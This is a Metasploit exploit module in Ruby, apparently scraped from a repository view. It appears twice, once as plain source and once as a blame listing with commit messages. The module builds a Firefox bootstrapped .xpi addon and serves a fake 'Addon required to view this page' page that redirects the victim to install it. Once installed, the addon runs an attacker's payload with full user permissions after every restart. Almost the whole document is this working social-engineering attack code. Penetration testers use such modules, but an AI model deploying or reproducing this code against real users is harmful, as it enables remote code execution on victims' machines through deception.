metasploit-framework/modules/exploits/multi/browser/firefox_xpi_bootstrapped_ad...

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
      'Description'   => %q{
          This exploit dynamically creates a .xpi addon file.
        The resulting bootstrapped Firefox addon is presented to
        the victim via a web page with.  The victim's Firefox browser
        will pop a dialog asking if they trust the addon.

        Once the user clicks "install", the addon is installed and
        executes the payload with full user permissions. As of Firefox
        4, this will work without a restart as the addon is marked to
        be "bootstrapped". As the addon will execute the payload after
        each Firefox restart, an option can be given to automatically
        uninstall the addon once the payload has been executed.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'mihi' ],
      'References'    =>
        [
          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
        ],
      'DisclosureDate' => 'Jun 27 2007'
    ))
  end

  def on_request_uri( cli, request )
    if not request.uri.match(/\.xpi$/i)
      if not request.uri.match(/\/$/)
        send_redirect( cli, get_resource() + '/', '')
        return
      end

      print_status("Handling request..." )

      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
      return
    end

    p = regenerate_payload(cli)
    if not p
      print_error("Failed to generate the payload.")
      # Send them a 404 so the browser doesn't hang waiting for data
      # that will never come.
      send_not_found(cli)
      return
    end


    print_status("Sending xpi and waiting for user to click 'accept'...")
    send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
    handler( cli )
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
    html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
    html << %Q|<script>window.location.href="addon.xpi";</script>\n|
    html << %Q|</body></html>|
    return html
  end
end
Add firefox_xpi_bootstrapped_addon exploit This is similar to java_signed_applet as it does not exploit a vulnerability, but hope that the user will trust the addon. 2012-04-10 11:33:04 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Add firefox_xpi_bootstrapped_addon exploit This is similar to java_signed_applet as it does not exploit a vulnerability, but hope that the user will trust the addon. 2012-04-10 11:33:04 +00:00			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'rex/zip'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpServer::HTML`
			`include Msf::Exploit::EXE`
Add firefox 15 chrome privilege exploit. * Moves the logic for generating a firefox addon into its own mixin * Updates the firefox_xpi_bootstrapped_addon module to use the mixin * Module only works if you move your mouse 1px in any direction. 2013-12-18 20:30:35 +00:00			`include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator`
Retab modules 2013-08-30 21:28:54 +00:00
			`def initialize( info = {} )`
			`super( update_info( info,`
			`'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',`
			`'Description' => %q{`
			`This exploit dynamically creates a .xpi addon file.`
			`The resulting bootstrapped Firefox addon is presented to`
			`the victim via a web page with. The victim's Firefox browser`
			`will pop a dialog asking if they trust the addon.`

			`Once the user clicks "install", the addon is installed and`
			`executes the payload with full user permissions. As of Firefox`
			`4, this will work without a restart as the addon is marked to`
			`be "bootstrapped". As the addon will execute the payload after`
			`each Firefox restart, an option can be given to automatically`
			`uninstall the addon once the payload has been executed.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'mihi' ],`
			`'References' =>`
			`[`
			`[ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],`
			`[ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]`
			`],`
Move addon datastore options into mixin. 2013-12-18 20:42:01 +00:00			`'DisclosureDate' => 'Jun 27 2007'`
Retab modules 2013-08-30 21:28:54 +00:00			`))`
			`end`

			`def on_request_uri( cli, request )`
			`if not request.uri.match(/\.xpi$/i)`
			`if not request.uri.match(/\/$/)`
			`send_redirect( cli, get_resource() + '/', '')`
			`return`
			`end`

			`print_status("Handling request..." )`

			`send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )`
			`return`
			`end`

			`p = regenerate_payload(cli)`
			`if not p`
			`print_error("Failed to generate the payload.")`
			`# Send them a 404 so the browser doesn't hang waiting for data`
			`# that will never come.`
			`send_not_found(cli)`
			`return`
			`end`

Add firefox_xpi_bootstrapped_addon exploit This is similar to java_signed_applet as it does not exploit a vulnerability, but hope that the user will trust the addon. 2012-04-10 11:33:04 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Sending xpi and waiting for user to click 'accept'...")`
Add firefox 15 chrome privilege exploit. * Moves the logic for generating a firefox addon into its own mixin * Updates the firefox_xpi_bootstrapped_addon module to use the mixin * Module only works if you move your mouse 1px in any direction. 2013-12-18 20:30:35 +00:00			`send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )`
Retab modules 2013-08-30 21:28:54 +00:00			`handler( cli )`
			`end`

			`def generate_html`
			`html = %Q\|<html><head><title>Loading, Please Wait...</title></head>\n\|`
			`html << %Q\|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n\|`
			`html << %Q\|<script>window.location.href="addon.xpi";</script>\n\|`
			`html << %Q\|</body></html>\|`
			`return html`
			`end`
Add firefox_xpi_bootstrapped_addon exploit This is similar to java_signed_applet as it does not exploit a vulnerability, but hope that the user will trust the addon. 2012-04-10 11:33:04 +00:00			`end`